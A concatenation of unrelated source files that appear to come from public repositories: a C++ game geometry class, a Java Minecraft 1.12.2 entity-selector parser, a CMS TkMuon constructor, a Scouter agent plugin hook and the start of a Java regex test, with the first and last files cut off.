int maxRot;
int curRot;
int buildingType;
int id;
int globalId;
//float minRad;
//float maxRad;
//float matId;
GameGeom() {
light = NULL;
}
void init(int _id) {
id = _id;
}
FIVector4 tempVec1;
FIVector4 tempVec2;
FIVector4 tempVec3;
FIVector4 *getBoundsMinInPixels() {
return &boundsMinInPixels;
}
FIVector4 *getBoundsMaxInPixels() {
return &boundsMaxInPixels;
}
FIVector4 *getVisMinInPixels() {
return &visMinInPixels;
}
FIVector4 *getVisMaxInPixels() {
return &visMaxInPixels;
}
FIVector4 *getBoundsMinInPixelsT() {
return &geomParams[E_GP_BOUNDSMININPIXELST];
}
FIVector4 *getBoundsMaxInPixelsT() {
return &geomParams[E_GP_BOUNDSMAXINPIXELST];
}
FIVector4 *getVisMinInPixelsT() {
// TODO: make this more efficient and use pixelsPerMeter
// tempVec1.copyFrom(&geomParams[E_GP_VISMININPIXELST]);
// tempVec1.addXYZ(pixelsPerMeter);
// return &tempVec1;
return &geomParams[E_GP_VISMININPIXELST];
}
FIVector4 *getVisMaxInPixelsT() {
return &geomParams[E_GP_VISMAXINPIXELST];
}
int getClampedRot() {
int tempRot = curRot;
while (tempRot < 0) {
tempRot += 4;
}
while (tempRot > 3) {
tempRot -= 4;
}
return tempRot;
}
void rotate(int mod, bool ignoreConstraints) {
if (hasAnchor) {
curRot += mod;
if (ignoreConstraints) {
if (curRot > 3) {
curRot = 0;
}
if (curRot < 0) {
curRot = 3;
}
}
else {
if (curRot > maxRot) {
curRot = maxRot - 1;
rotDir *= -1;
}
if (curRot < minRot) {
curRot = minRot + 1;
rotDir *= -1;
}
}
}
else {
cout << "Attemped to rotate without anchor.\n";
}
}
void initBounds(
int _buildingType,
int _id,
int _globalId,
int alignBottomMiddleTop,
float _zOffset,
FIVector4 *p1,
FIVector4 *p2,
FIVector4 *rad,
FIVector4 *_cornerDisInPixels,
FIVector4 *_visInsetFromMin,
FIVector4 *_visInsetFromMax,
FIVector4 *_powerVals,
FIVector4 *_powerVals2,
FIVector4 *_thickVals,
FIVector4 *_matParams,
FIVector4 *_centerPoint,
FIVector4 *_anchorPoint,
int _minRot,
int _maxRot
) {
buildingType = _buildingType;
id = _id;
globalId = _globalId;
float temp;
float zOffset = _zOffset;
isToggled = false;
curRot = 0;
rotDir = 1;
visible = true;
hasAnchor = false;
anchorPointInPixels.setFXYZ(0.0f, 0.0f, 0.0f);
boundsMinInPixels.setFXYZRef(p1);
boundsMaxInPixels.setFXYZRef(p2);
FIVector4::normalizeBounds(&boundsMinInPixels, &boundsMaxInPixels);
boundsMinInPixels.addXYZRef(rad, -1.0f);
boundsMaxInPixels.addXYZRef(rad, 1.0f);
switch (alignBottomMiddleTop) {
case E_ALIGN_BOTTOM: // bottom _@_
zOffset += (rad->getFZ() - _visInsetFromMin->getFZ());
break;
case E_ALIGN_MIDDLE: // middle -@-
zOffset += 0.0f;
break;
// ___
case E_ALIGN_TOP: // top @
zOffset += -(rad->getFZ() - _visInsetFromMax->getFZ());
break;
}
boundsMinInPixels.addXYZ(0.0f, 0.0f, zOffset);
boundsMaxInPixels.addXYZ(0.0f, 0.0f, zOffset);
visMinInPixels.setFXYZRef(&boundsMinInPixels);
visMaxInPixels.setFXYZRef(&boundsMaxInPixels);
visMinInPixels.addXYZRef(_visInsetFromMin, 1.0f);
visMaxInPixels.addXYZRef(_visInsetFromMax, -1.0f);
geomParams[E_GP_CORNERDISINPIXELS].setFXYZRef(_cornerDisInPixels);
geomParams[E_GP_POWERVALS].setFXYZRef(_powerVals);
geomParams[E_GP_POWERVALS2].setFXYZRef(_powerVals2);
geomParams[E_GP_THICKVALS].setFXYZRef(_thickVals);
geomParams[E_GP_MATPARAMS].setFXYZRef(_matParams);
geomParams[E_GP_CENTERPOINT].setFXYZRef(_centerPoint);
moveMinInPixels.setFXYZRef(&boundsMinInPixels);
moveMaxInPixels.setFXYZRef(&boundsMaxInPixels);
geomParams[E_GP_BOUNDSMININPIXELST].setFXYZRef(&boundsMinInPixels);
geomParams[E_GP_BOUNDSMAXINPIXELST].setFXYZRef(&boundsMaxInPixels);
geomParams[E_GP_VISMININPIXELST].setFXYZRef(&visMinInPixels);
geomParams[E_GP_VISMAXINPIXELST].setFXYZRef(&visMaxInPixels);
if (_minRot != _maxRot) {
initAnchorPoint(_anchorPoint, _minRot, _maxRot);
}
}
void initLines(
int _buildingType,
int _id,
int _globalId,
float scale,
FIVector4 *_offset,
FIVector4 *_orgVec,
FIVector4 *_tanVec, // already scaled
FIVector4 *_bitVec,
FIVector4 *_norVec,
FIVector4 *_radVec0,
FIVector4 *_radVec1,
FIVector4 *_radVecScale0,
FIVector4 *_radVecScale1,
FIVector4 *_matParams
) {
buildingType = _buildingType;
id = _id;
globalId = _globalId;
float temp;
float radMax;
curRot = 0;
rotDir = 1;
visible = true;
hasAnchor = false;
anchorPointInPixels.setFXYZ(0.0f, 0.0f, 0.0f);
tempVec1.setFXYZRef(_orgVec);
tempVec2.setFXYZRef(_radVec0);
tempVec3.setFXYZRef(_radVec1);
tempVec2.multXYZ(_radVecScale0);
tempVec3.multXYZ(_radVecScale1);
tempVec1.multXYZ(scale);
tempVec2.multXYZ(scale);
tempVec3.multXYZ(scale);
tempVec1.addXYZRef(_offset);
boundsMinInPixels.setFXYZRef(&tempVec1);
boundsMaxInPixels.setFXYZRef(&tempVec1);
boundsMinInPixels.addXYZRef(_tanVec,-1.0);
boundsMaxInPixels.addXYZRef(_tanVec);
FIVector4::normalizeBounds(&boundsMinInPixels, &boundsMaxInPixels);
radMax = max(
max(
max(tempVec2[0], tempVec2[1]),
max(tempVec3[0], tempVec3[1])
),
max(tempVec2[2], tempVec3[2])
);
boundsMinInPixels.addXYZ(-radMax);
boundsMaxInPixels.addXYZ(radMax);
visMinInPixels.setFXYZRef(&boundsMinInPixels);
visMaxInPixels.setFXYZRef(&boundsMaxInPixels);
moveMinInPixels.setFXYZRef(&boundsMinInPixels);
moveMaxInPixels.setFXYZRef(&boundsMaxInPixels);
geomParams[E_AP_ORG].setFXYZRef(&tempVec1);
geomParams[E_AP_TAN].setFXYZRef(_tanVec);
geomParams[E_AP_BIT].setFXYZRef(_bitVec);
geomParams[E_AP_NOR].setFXYZRef(_norVec);
geomParams[E_AP_RAD0].setFXYZRef(&tempVec2);
geomParams[E_AP_RAD1].setFXYZRef(&tempVec3);
geomParams[E_AP_MATPARAMS].setFXYZRef(_matParams);
geomParams[E_AP_VISMININPIXELST].setFXYZRef(&visMinInPixels);
geomParams[E_AP_VISMAXINPIXELST].setFXYZRef(&visMaxInPixels);
}
void initTree(
int _buildingType,
int _id,
int _globalId,
// p0, p1 = start, end
// p2 = control point or tangent
FIVector4 *p0,
FIVector4 *p1,
FIVector4 *p2,
float radP0,
float radP1,
float sphereRad,
// FIVector4* rad,
// FIVector4* _cornerDisInPixels,
//FIVector4* _visInsetFromMin,
//FIVector4* _visInsetFromMax,
// FIVector4* _powerVals,
// FIVector4* _powerVals2,
// FIVector4* _thickVals,
FIVector4 *_matParams
) {
buildingType = _buildingType;
id = _id;
globalId = _globalId;
float temp;
float radMax = max(max(radP0, radP1), sphereRad);
curRot = 0;
rotDir = 1;
visible = true;
hasAnchor = false;
anchorPointInPixels.setFXYZ(0.0f, 0.0f, 0.0f);
boundsMinInPixels.setFXYZRef(p0);
boundsMaxInPixels.setFXYZRef(p1);
//boundsMinInPixels.addXYZ(-radMax);
//boundsMaxInPixels.addXYZ(radMax);
FIVector4::normalizeBounds(&boundsMinInPixels, &boundsMaxInPixels);
FIVector4::growBoundary(&boundsMinInPixels, &boundsMaxInPixels, p2, p2);
boundsMinInPixels.addXYZ(-radMax);
boundsMaxInPixels.addXYZ(radMax);
visMinInPixels.setFXYZRef(&boundsMinInPixels);
visMaxInPixels.setFXYZRef(&boundsMaxInPixels);
//visMinInPixels.addXYZRef(_visInsetFromMin, 1.0f);
//visMaxInPixels.addXYZRef(_visInsetFromMax, -1.0f);
// geomParams[E_GP_CORNERDISINPIXELS].setFXYZRef(_cornerDisInPixels);
// geomParams[E_GP_POWERVALS].setFXYZRef(_powerVals);
// geomParams[E_GP_POWERVALS2].setFXYZRef(_powerVals2);
geomParams[E_TP_P0].setFXYZRef(p0);
geomParams[E_TP_P1].setFXYZRef(p1);
geomParams[E_TP_P2].setFXYZRef(p2);
geomParams[E_TP_THICKVALS].setFXYZ(radP0, radP1, sphereRad);
geomParams[E_TP_MATPARAMS].setFXYZRef(_matParams);
moveMinInPixels.setFXYZRef(&boundsMinInPixels);
moveMaxInPixels.setFXYZRef(&boundsMaxInPixels);
// geomParams[E_GP_BOUNDSMININPIXELST].setFXYZRef(&boundsMinInPixels);
// geomParams[E_GP_BOUNDSMAXINPIXELST].setFXYZRef(&boundsMaxInPixels);
geomParams[E_TP_VISMININPIXELST].setFXYZRef(&visMinInPixels);
geomParams[E_TP_VISMAXINPIXELST].setFXYZRef(&visMaxInPixels);
}
void toggleTransform() {
isToggled = !isToggled;
applyTransform(rotDir, false);
}
void applyTransform(int rotMod, bool ignoreConstraints) {
rotate(rotMod, ignoreConstraints);
geomParams[E_GP_BOUNDSMININPIXELST].setFXYZRef(&boundsMinInPixels);
geomParams[E_GP_BOUNDSMAXINPIXELST].setFXYZRef(&boundsMaxInPixels);
geomParams[E_GP_VISMININPIXELST].setFXYZRef(&visMinInPixels);
geomParams[E_GP_VISMAXINPIXELST].setFXYZRef(&visMaxInPixels);
geomParams[E_GP_BOUNDSMININPIXELST].addXYZRef(&anchorPointInPixels, -1.0f);
geomParams[E_GP_BOUNDSMAXINPIXELST].addXYZRef(&anchorPointInPixels, -1.0f);
geomParams[E_GP_VISMININPIXELST].addXYZRef(&anchorPointInPixels, -1.0f);
geomParams[E_GP_VISMAXINPIXELST].addXYZRef(&anchorPointInPixels, -1.0f);
geomParams[E_GP_BOUNDSMININPIXELST].rotate90(getClampedRot());
geomParams[E_GP_BOUNDSMAXINPIXELST].rotate90(getClampedRot());
geomParams[E_GP_VISMININPIXELST].rotate90(getClampedRot());
geomParams[E_GP_VISMAXINPIXELST].rotate90(getClampedRot());
geomParams[E_GP_BOUNDSMININPIXELST].addXYZRef(&anchorPointInPixels, 1.0f);
geomParams[E_GP_BOUNDSMAXINPIXELST].addXYZRef(&anchorPointInPixels, 1.0f);
geomParams[E_GP_VISMININPIXELST].addXYZRef(&anchorPointInPixels, 1.0f);
geomParams[E_GP_VISMAXINPIXELST].addXYZRef(&anchorPointInPixels, 1.0f);
FIVector4::normalizeBounds(&geomParams[E_GP_BOUNDSMININPIXELST], &geomParams[E_GP_BOUNDSMAXINPIXELST]);
FIVector4::normalizeBounds(&geomParams[E_GP_VISMININPIXELST], &geomParams[E_GP_VISMAXINPIXELST]);
FIVector4::growBoundary(&moveMinInPixels, &moveMaxInPixels, &geomParams[E_GP_VISMININPIXELST], &geomParams[E_GP_VISMAXINPIXELST]);
}
void initAnchorPoint(FIVector4 *_anchorPointInPixels, int _minRot, int _maxRot) {
int i;
hasAnchor = true;
anchorPointInPixels.setFXYZRef(_anchorPointInPixels);
minRot = _minRot;
maxRot = _maxRot;
for (i = 0; i < 4; i++) {
applyTransform(1, true);
}
}
};
| 5,648 |
394 | <gh_stars>100-1000
package net.earthcomputer.multiconnect.protocols.v1_12_2.command.arguments;
import com.mojang.brigadier.LiteralMessage;
import com.mojang.brigadier.StringReader;
import com.mojang.brigadier.arguments.ArgumentType;
import com.mojang.brigadier.context.CommandContext;
import com.mojang.brigadier.exceptions.CommandSyntaxException;
import com.mojang.brigadier.exceptions.DynamicCommandExceptionType;
import com.mojang.brigadier.exceptions.SimpleCommandExceptionType;
import com.mojang.brigadier.suggestion.Suggestions;
import com.mojang.brigadier.suggestion.SuggestionsBuilder;
import net.earthcomputer.multiconnect.api.Protocols;
import net.earthcomputer.multiconnect.impl.ConnectionInfo;
import net.earthcomputer.multiconnect.protocols.v1_10.Protocol_1_10;
import net.earthcomputer.multiconnect.protocols.v1_12_2.TabCompletionManager;
import net.minecraft.command.CommandSource;
import net.minecraft.command.argument.EntitySummonArgumentType;
import net.minecraft.entity.EntityType;
import net.minecraft.util.Identifier;
import net.minecraft.util.registry.Registry;
import java.util.*;
import java.util.concurrent.CompletableFuture;
import java.util.function.Function;
import java.util.stream.Collectors;
import java.util.stream.Stream;
public final class EntityArgumentType_1_12_2 implements ArgumentType<Void> {
private static final Collection<String> EXAMPLES = Arrays.asList("Player", "0123", "@e", "@e[type=foo]", "dd12be42-52a9-4a91-a8a1-11c01849e498");
private static final SimpleCommandExceptionType EXPECTED_SELECTOR_TYPE_EXCEPTION = new SimpleCommandExceptionType(new LiteralMessage("Expected selector type"));
private static final DynamicCommandExceptionType UNKNOWN_OPTION_EXCEPTION = new DynamicCommandExceptionType(arg -> new LiteralMessage("Unknown option \"" + arg + "\""));
private static final DynamicCommandExceptionType DUPLICATE_OPTION_EXCEPTION = new DynamicCommandExceptionType(arg -> new LiteralMessage("Duplicate option \"" + arg + "\""));
private static final DynamicCommandExceptionType DISALLOWED_OPTION_EXCEPTION = new DynamicCommandExceptionType(arg -> new LiteralMessage("Option \"" + arg + "\" is disallowed at this location"));
private static final SimpleCommandExceptionType NO_MULTIPLE_EXCEPTION = new SimpleCommandExceptionType(new LiteralMessage("Cannot match multiple entities here"));
private static final SimpleCommandExceptionType PLAYERS_ONLY_EXCEPTION = new SimpleCommandExceptionType(new LiteralMessage("This selector cannot match players, but only players are allowed"));
private static final DynamicCommandExceptionType EXPECTED_GAMEMODE_EXCEPTION = new DynamicCommandExceptionType(arg -> new LiteralMessage("Expected gamemode, got \"" + arg + "\""));
private static final Map<String, Option> SELECTOR_OPTIONS = new HashMap<>();
private final boolean singleTarget;
private final boolean playersOnly;
private boolean suggestPlayerNames = true;
private EntityArgumentType_1_12_2(boolean singleTarget, boolean playersOnly) {
this.singleTarget = singleTarget;
this.playersOnly = playersOnly;
}
public static EntityArgumentType_1_12_2 players() {
return new EntityArgumentType_1_12_2(false, true);
}
public static EntityArgumentType_1_12_2 onePlayer() {
return new EntityArgumentType_1_12_2(true, true);
}
public static EntityArgumentType_1_12_2 entities() {
return new EntityArgumentType_1_12_2(false, false);
}
public static EntityArgumentType_1_12_2 oneEntity() {
return new EntityArgumentType_1_12_2(true, false);
}
public EntityArgumentType_1_12_2 noSuggestPlayerNames() {
this.suggestPlayerNames = false;
return this;
}
@Override
public Void parse(StringReader reader) throws CommandSyntaxException {
if (reader.canRead() && reader.peek() == '@') {
new EntitySelectorParser(reader, singleTarget, playersOnly).parse();
} else {
reader.readUnquotedString();
}
return null;
}
@SuppressWarnings("unchecked")
@Override
public <S> CompletableFuture<Suggestions> listSuggestions(CommandContext<S> context, SuggestionsBuilder builder) {
if (!(context.getSource() instanceof CommandSource))
return builder.buildFuture();
StringReader reader = new StringReader(builder.getInput());
reader.setCursor(builder.getStart());
CompletableFuture<Suggestions> playerCompletions;
if ((reader.canRead() && reader.peek() == '@') || !suggestPlayerNames) {
playerCompletions = Suggestions.empty();
} else {
playerCompletions =
((CommandSource) context.getSource()).getCompletions((CommandContext<CommandSource>) context,
builder.restart());
}
EntitySelectorParser parser = new EntitySelectorParser(reader, singleTarget, playersOnly);
try {
parser.parse();
} catch (CommandSyntaxException ignore) {
}
var selectorCompletions = parser.suggestor.apply(builder.restart());
return CompletableFuture.allOf(playerCompletions, selectorCompletions)
.thenCompose(v -> UnionArgumentType.mergeSuggestions(playerCompletions.join(),
selectorCompletions.join()));
}
@Override
public Collection<String> getExamples() {
return EXAMPLES;
}
private static class EntitySelectorParser {
private final StringReader reader;
private boolean singleTarget;
private boolean playersOnly;
private Function<SuggestionsBuilder, CompletableFuture<Suggestions>> suggestor = SuggestionsBuilder::buildFuture;
private boolean cannotSelectPlayers = false;
private boolean typeKnown = false;
private final Set<String> seenOptions = new HashSet<>();
private boolean hadExplicitOption = false;
public EntitySelectorParser(StringReader reader, boolean singleTarget, boolean playersOnly) {
this.reader = reader;
this.singleTarget = singleTarget;
this.playersOnly = playersOnly;
}
public void parse() throws CommandSyntaxException {
int start = reader.getCursor();
suggestor = builder -> {
builder = builder.createOffset(start);
builder.suggest("@p");
if (!singleTarget)
builder.suggest("@a");
builder.suggest("@r");
if (!playersOnly)
builder.suggest("@e");
if (ConnectionInfo.protocolVersion > Protocols.V1_11_2)
builder.suggest("@s");
return builder.buildFuture();
};
reader.expect('@');
if (!reader.canRead()) {
reader.setCursor(start);
throw EXPECTED_SELECTOR_TYPE_EXCEPTION.createWithContext(reader);
}
switch (reader.read()) {
case 'p':
singleTarget = true;
playersOnly = true;
typeKnown = true;
break;
case 'a':
if (singleTarget) {
reader.setCursor(start);
throw NO_MULTIPLE_EXCEPTION.createWithContext(reader);
}
playersOnly = true;
typeKnown = true;
break;
case 'r':
typeKnown = true;
break;
case 'e':
break;
case 's':
if (ConnectionInfo.protocolVersion <= Protocols.V1_11_2) {
reader.setCursor(start);
throw EXPECTED_SELECTOR_TYPE_EXCEPTION.createWithContext(reader);
}
typeKnown = true;
singleTarget = true;
break;
default:
reader.setCursor(start);
throw EXPECTED_SELECTOR_TYPE_EXCEPTION.createWithContext(reader);
}
int bracketStart = reader.getCursor();
if (!reader.canRead()) {
suggestor = builder -> {
builder = builder.createOffset(bracketStart);
builder.suggest("[");
return builder.buildFuture();
};
return;
}
if (reader.canRead() && reader.peek() == '[') {
reader.skip();
if (reader.canRead() && reader.peek() == ']') {
reader.skip();
} else {
while (true) {
readOption();
if (reader.canRead() && reader.peek() == ',') {
reader.skip();
} else {
reader.expect(']');
break;
}
}
}
}
suggestor = SuggestionsBuilder::buildFuture;
}
private void readOption() throws CommandSyntaxException {
suggestOption();
int start = reader.getCursor();
String optionName = reader.readUnquotedString();
if (!optionName.startsWith("score_") && !SELECTOR_OPTIONS.containsKey(optionName)) {
reader.setCursor(start);
if (ConnectionInfo.protocolVersion <= Protocols.V1_10 && !hadExplicitOption && seenOptions.size() < 4) {
boolean validInteger;
try {
Integer.parseInt(optionName);
validInteger = true;
} catch (NumberFormatException e) {
validInteger = false;
}
if (validInteger) {
reader.readUnquotedString();
if (reader.canRead() && (reader.peek() == ',' || reader.peek() == ']')) {
switch (seenOptions.size()) {
case 0 -> seenOptions.add("x");
case 1 -> seenOptions.add("y");
case 2 -> seenOptions.add("z");
case 3 -> seenOptions.add("r");
}
return;
} else {
reader.setCursor(start);
}
}
}
throw UNKNOWN_OPTION_EXCEPTION.createWithContext(reader, optionName);
}
if (seenOptions.contains(optionName)) {
reader.setCursor(start);
throw DUPLICATE_OPTION_EXCEPTION.createWithContext(reader, optionName);
}
if (!optionName.startsWith("score_") && !SELECTOR_OPTIONS.get(optionName).isAllowed(this)) {
reader.setCursor(start);
throw DISALLOWED_OPTION_EXCEPTION.createWithContext(reader, optionName);
}
seenOptions.add(optionName);
hadExplicitOption = true;
reader.expect('=');
suggestor = SuggestionsBuilder::buildFuture;
if (optionName.startsWith("score_")) {
reader.readInt();
} else {
SELECTOR_OPTIONS.get(optionName).parse(this);
}
}
private void suggestOption() {
int start = reader.getCursor();
List<String> seenOptionsCopy = new ArrayList<>(seenOptions);
suggestor = builder -> {
SuggestionsBuilder normalOptionBuilder = builder.createOffset(start);
CommandSource.suggestMatching(SELECTOR_OPTIONS.keySet().stream()
.filter(opt -> SELECTOR_OPTIONS.get(opt).isAllowed(this))
.filter(opt -> !seenOptionsCopy.contains(opt))
.map(opt -> opt + "=")
.collect(Collectors.toSet()), normalOptionBuilder);
var normalOptions = normalOptionBuilder.buildFuture();
SuggestionsBuilder scoreOptionBuilder = builder.createOffset(start);
var scoreOptions = getScoreObjectives().thenCompose(objectives -> {
CommandSource.suggestMatching(objectives.stream()
.map(str -> "score_" + str)
.filter(str -> !seenOptionsCopy.contains(str))
.map(str -> str + "="),
scoreOptionBuilder);
CommandSource.suggestMatching(objectives.stream()
.map(str -> "score_" + str + "_min")
.filter(str -> !seenOptionsCopy.contains(str))
.map(str -> str + "="),
scoreOptionBuilder);
return scoreOptionBuilder.buildFuture();
});
return CompletableFuture.allOf(normalOptions, scoreOptions)
.thenCompose(v -> UnionArgumentType.mergeSuggestions(normalOptions.join(), scoreOptions.join()));
};
}
private CompletableFuture<List<String>> getScoreObjectives() {
return TabCompletionManager.requestCustomCompletion("/scoreboard objectives remove ");
}
private void parseInt(int min, int max) throws CommandSyntaxException {
int start = reader.getCursor();
int val = reader.readInt();
if (val < min) {
reader.setCursor(start);
throw CommandSyntaxException.BUILT_IN_EXCEPTIONS.integerTooLow().createWithContext(reader, min, val);
}
if (val > max) {
reader.setCursor(start);
throw CommandSyntaxException.BUILT_IN_EXCEPTIONS.integerTooHigh().createWithContext(reader, max, val);
}
}
private boolean parseIsInverted() {
if (reader.canRead() && reader.peek() == '!') {
reader.skip();
return true;
}
return false;
}
}
static {
SELECTOR_OPTIONS.put("r", parser -> parser.parseInt(0, Integer.MAX_VALUE));
SELECTOR_OPTIONS.put("rm", parser -> parser.parseInt(0, Integer.MAX_VALUE));
SELECTOR_OPTIONS.put("l", new Option() {
@Override
public void parse(EntitySelectorParser parser) throws CommandSyntaxException {
parser.playersOnly = true;
parser.typeKnown = true;
parser.parseInt(0, Integer.MAX_VALUE);
}
@Override
public boolean isAllowed(EntitySelectorParser parser) {
return !parser.cannotSelectPlayers;
}
});
SELECTOR_OPTIONS.put("lm", new Option() {
@Override
public void parse(EntitySelectorParser parser) throws CommandSyntaxException {
parser.playersOnly = true;
parser.typeKnown = true;
parser.parseInt(0, Integer.MAX_VALUE);
}
@Override
public boolean isAllowed(EntitySelectorParser parser) {
return !parser.cannotSelectPlayers;
}
});
SELECTOR_OPTIONS.put("x", parser -> parser.reader.readInt());
SELECTOR_OPTIONS.put("y", parser -> parser.reader.readInt());
SELECTOR_OPTIONS.put("z", parser -> parser.reader.readInt());
SELECTOR_OPTIONS.put("dx", parser -> parser.reader.readInt());
SELECTOR_OPTIONS.put("dy", parser -> parser.reader.readInt());
SELECTOR_OPTIONS.put("dz", parser -> parser.reader.readInt());
SELECTOR_OPTIONS.put("rx", parser -> parser.parseInt(-90, 90));
SELECTOR_OPTIONS.put("rxm", parser -> parser.parseInt(-90, 90));
SELECTOR_OPTIONS.put("ry", parser -> parser.parseInt(-360, 360));
SELECTOR_OPTIONS.put("rym", parser -> parser.parseInt(-360, 360));
SELECTOR_OPTIONS.put("c", parser -> {
int start = parser.reader.getCursor();
int val = parser.reader.readInt();
boolean multiple = val != -1 && val != 1;
if (parser.singleTarget && multiple) {
parser.reader.setCursor(start);
throw NO_MULTIPLE_EXCEPTION.createWithContext(parser.reader);
}
if (!multiple)
parser.singleTarget = true;
});
SELECTOR_OPTIONS.put("m", new Option() {
@Override
public void parse(EntitySelectorParser parser) throws CommandSyntaxException {
int start = parser.reader.getCursor();
parser.playersOnly = true;
parser.typeKnown = true;
if (ConnectionInfo.protocolVersion <= Protocols.V1_8) {
parser.suggestor = builder -> {
builder = builder.createOffset(start);
builder.suggest(0);
builder.suggest(1);
builder.suggest(2);
builder.suggest(3);
return builder.buildFuture();
};
parser.parseInt(0, 3);
} else {
parser.suggestor = builder -> {
builder = builder.createOffset(start);
builder.suggest("creative");
builder.suggest("!creative");
builder.suggest("survival");
builder.suggest("!survival");
builder.suggest("adventure");
builder.suggest("!adventure");
builder.suggest("spectator");
builder.suggest("!spectator");
return builder.buildFuture();
};
parser.parseIsInverted();
int gamemodeStart = parser.reader.getCursor();
String gamemode = parser.reader.readUnquotedString();
switch (gamemode) {
case "c":
case "s":
case "a":
case "sp":
case "creative":
case "survival":
case "adventure":
case "spectator":
break;
default:
try {
int intMode = Integer.parseInt(gamemode);
if (intMode >= 0 && intMode <= 3) {
break;
}
} catch (NumberFormatException ignore) {
}
parser.reader.setCursor(gamemodeStart);
throw EXPECTED_GAMEMODE_EXCEPTION.createWithContext(parser.reader, gamemode);
}
}
}
@Override
public boolean isAllowed(EntitySelectorParser parser) {
return !parser.cannotSelectPlayers;
}
});
SELECTOR_OPTIONS.put("team", parser -> {
int start = parser.reader.getCursor();
parser.suggestor = builder -> {
SuggestionsBuilder newBuilder = builder.createOffset(start);
return TabCompletionManager.requestCustomCompletion("/scoreboard teams remove ").thenCompose(teams -> {
CommandSource.suggestMatching(teams, newBuilder);
CommandSource.suggestMatching(teams.stream().map(str -> "!" + str), newBuilder);
return newBuilder.buildFuture();
});
};
parser.parseIsInverted();
parser.reader.readUnquotedString();
});
SELECTOR_OPTIONS.put("name", parser -> {
parser.parseIsInverted();
parser.reader.readUnquotedString();
});
SELECTOR_OPTIONS.put("type", new Option() {
@Override
public void parse(EntitySelectorParser parser) throws CommandSyntaxException {
int start = parser.reader.getCursor();
parser.suggestor = builder -> {
builder = builder.createOffset(start);
if (parser.playersOnly) {
if (ConnectionInfo.protocolVersion <= Protocols.V1_10) {
CommandSource.suggestMatching(new String[] {"Player"}, builder);
} else {
CommandSource.suggestIdentifiers(Collections.singleton(new Identifier("player")), builder);
}
} else {
if (ConnectionInfo.protocolVersion <= Protocols.V1_10) {
CommandSource.suggestMatching(Registry.ENTITY_TYPE.stream()
.filter(EntityArgumentType_1_12_2::canSelectEntityType)
.map(Protocol_1_10::getEntityId)
.filter(Objects::nonNull)
.flatMap(it -> Stream.of(it, "!" + it)),
builder);
} else {
CommandSource.suggestIdentifiers(Registry.ENTITY_TYPE.stream()
.filter(EntityArgumentType_1_12_2::canSelectEntityType)
.map(EntityType::getId),
builder);
CommandSource.suggestIdentifiers(Registry.ENTITY_TYPE.stream()
.filter(EntityArgumentType_1_12_2::canSelectEntityType)
.map(EntityType::getId)::iterator,
builder,
"!");
}
}
return builder.buildFuture();
};
boolean inverted = parser.parseIsInverted();
EntityType<?> entityType;
if (ConnectionInfo.protocolVersion <= Protocols.V1_10) {
String entityId = parser.reader.readUnquotedString();
entityType = Protocol_1_10.getEntityById(entityId);
if (entityType == null || !canSelectEntityType(entityType)) {
parser.reader.setCursor(start);
throw EntitySummonArgumentType.NOT_FOUND_EXCEPTION.createWithContext(parser.reader, entityId);
}
} else {
Identifier entityId = Identifier.fromCommandInput(parser.reader);
entityType = Registry.ENTITY_TYPE.get(entityId);
if (!Registry.ENTITY_TYPE.containsId(entityId) || !canSelectEntityType(entityType)) {
parser.reader.setCursor(start);
throw EntitySummonArgumentType.NOT_FOUND_EXCEPTION.createWithContext(parser.reader, entityId);
}
}
if (!inverted) {
parser.typeKnown = true;
if (entityType == EntityType.PLAYER) {
parser.playersOnly = true;
} else {
parser.cannotSelectPlayers = true;
}
}
if (parser.playersOnly && (!parser.typeKnown || parser.cannotSelectPlayers)) {
parser.reader.setCursor(start);
throw PLAYERS_ONLY_EXCEPTION.createWithContext(parser.reader);
}
}
@Override
public boolean isAllowed(EntitySelectorParser parser) {
return !parser.typeKnown;
}
});
SELECTOR_OPTIONS.put("tag", parser -> {
parser.parseIsInverted();
parser.reader.readUnquotedString();
});
}
private static boolean canSelectEntityType(EntityType<?> type) {
return type != EntityType.FISHING_BOBBER && type != EntityType.LIGHTNING_BOLT;
}
@FunctionalInterface
private interface Option {
void parse(EntitySelectorParser parser) throws CommandSyntaxException;
default boolean isAllowed(EntitySelectorParser parser) {
return true;
}
}
}
| 12,396 |
852 | // -*- C++ -*-
//
// Package: L1Trigger
// Class : TkMuon
#include "DataFormats/L1TCorrelator/interface/TkMuon.h"
using namespace l1t;
TkMuon::TkMuon(const LorentzVector& p4,
const edm::Ref<RegionalMuonCandBxCollection>& muRef,
const edm::Ptr<L1TTTrackType>& trackPtr,
float tkisol)
: L1Candidate(p4), muRef_(muRef), trkPtr_(trackPtr), theIsolation(tkisol), TrkzVtx_(999), quality_(999) {
if (trkPtr_.isNonnull()) {
setTrkzVtx(trkPtr()->POCA().z());
}
}
TkMuon::TkMuon(const LorentzVector& p4,
const edm::Ref<EMTFTrackCollection>& emtfRef,
const edm::Ptr<L1TTTrackType>& trackPtr,
float tkisol)
: L1Candidate(p4), emtfTrk_(emtfRef), trkPtr_(trackPtr), theIsolation(tkisol), TrkzVtx_(999), quality_(999) {
if (trkPtr_.isNonnull()) {
setTrkzVtx(trkPtr()->POCA().z());
}
}
TkMuon::TkMuon(const LorentzVector& p4, const edm::Ptr<L1TTTrackType>& trackPtr, float tkisol)
: L1Candidate(p4), trkPtr_(trackPtr), theIsolation(tkisol), TrkzVtx_(999), quality_(999) {
if (trkPtr_.isNonnull()) {
setTrkzVtx(trkPtr()->POCA().z());
}
}
| 575 |
2,053 | <gh_stars>1000+
/*
* Copyright 2015 the original author or authors.
* @https://github.com/scouter-project/scouter
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package scouter.agent.plugin;
import scouter.agent.trace.HookArgs;
import scouter.agent.trace.TraceContext;
public class PluginBackThreadTrace {
static AbstractAppService plugIn;
static {
PluginLoader.getInstance();
}
public static void start(TraceContext ctx, HookArgs hook) {
if (plugIn != null) {
try {
plugIn.start(new WrContext(ctx), hook);
} catch (Throwable t) {
}
}
}
public static void end(TraceContext ctx) {
if (plugIn != null) {
try {
plugIn.end(new WrContext(ctx));
} catch (Throwable t) {
}
}
}
}
| 417 |
615 | package org.byron4j.cookbook;
import sun.misc.Regexp;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class TestCase {
static String regStr = "<[a-z]{1}>([\\u4E00-\\u9FFF]|\\w|\\W){2}</[a-z]{1}>";
